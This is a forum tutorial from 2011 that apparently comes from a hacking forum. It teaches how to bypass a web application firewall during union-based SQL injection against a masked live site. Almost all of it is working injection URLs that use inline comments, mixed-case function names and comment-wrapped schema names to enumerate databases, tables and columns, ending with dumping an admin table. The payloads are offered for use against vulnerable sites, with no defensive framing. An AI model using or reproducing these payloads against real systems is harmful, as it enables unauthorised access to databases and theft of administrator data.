SQL Injection; Basic WAF bypass

I assume you know how to perform a union based SQL injection, if not check out my tutorial here:

http://www.hackforums.net/showthread.php?tid=1148283

Ok lets get started.

You have found your SQLi vulnerable site, you found how many columns it has (in this case 62 xD)

You do the regular command:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ​ ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 ​7,58,59,60,61,62--

The website returns this error message:

[Image: tutorialmessage.jpg]

What you would like to do now is you use inline comments to comment out the blocked commands, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 ​ ,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,5 ​7,58,59,60,61,62--

And now the website returns this:

[Image: tutorialnumbers.jpg]

Ok now we will try to add version(),database() and user() in one line like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,concat('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5 ​ ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ​ ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 ​0,61,62--

The website returns this:

[Image: tutorialmessage.jpg]

We would now like to make "concat" both upper and lower case letters, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,CoNcAt('join7+was+here',0x3a,version(),0x3a,user(),0x3a,database(),0x3a),5 ​ ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33 ​ ,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,6 ​0,61,62--

The website returns;

[Image: tutorialversion.jpg]

Now for the good part; lets try to find all the databases, here is the regular syntax:

Code:
http://www.****.org/members/member.php?id=-182 UNION SELECT 1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ​ ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 ​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

But with our new techniques the syntax would look like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,GrOuP_CoNcAt(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ​ ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 ​9,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.schemata--

The website returns:

[Image: tutorialdbs.jpg]

now we would like to get the tables:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, ​ 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ​,50,51,52,53,54,55,56,57,58,59,60,61,62 from information_schema.tables where table_schema=database()--

The website returns:

[Image: tutorialmessage.jpg]

Now you have to in some way comment out information_schema or tables, like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22, ​ 23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49 ​,50,51,52,53,54,55,56,57,58,59,60,61,62 from /*!information_schema*/.tables where table_schema=database()--

and this returns:

[Image: tutorialtables.jpg]

it's the same to get columns, you know the drill.

If you now want to dump columns id from admin table you do like this:

Code:
http://www.****.org/members/member.php?id=-182 /*!UNION*/ /*!SELECT*/ 1,2,3,Group_Concat(id),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 ​ ,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,5 ​2,53,54,55,56,57,58,59,60,61,62 from admin--

Hope you learned something from my tutorial, feel free to ask if you have any questions.

REMEMBER; This is only BASIC WAF bypass, the techniques are endless

I have worked hard on this, please don't leech it.

If you do, give credits to me.


© Copyright Join7 2011

-
Cowards die many times before their deaths

Categories: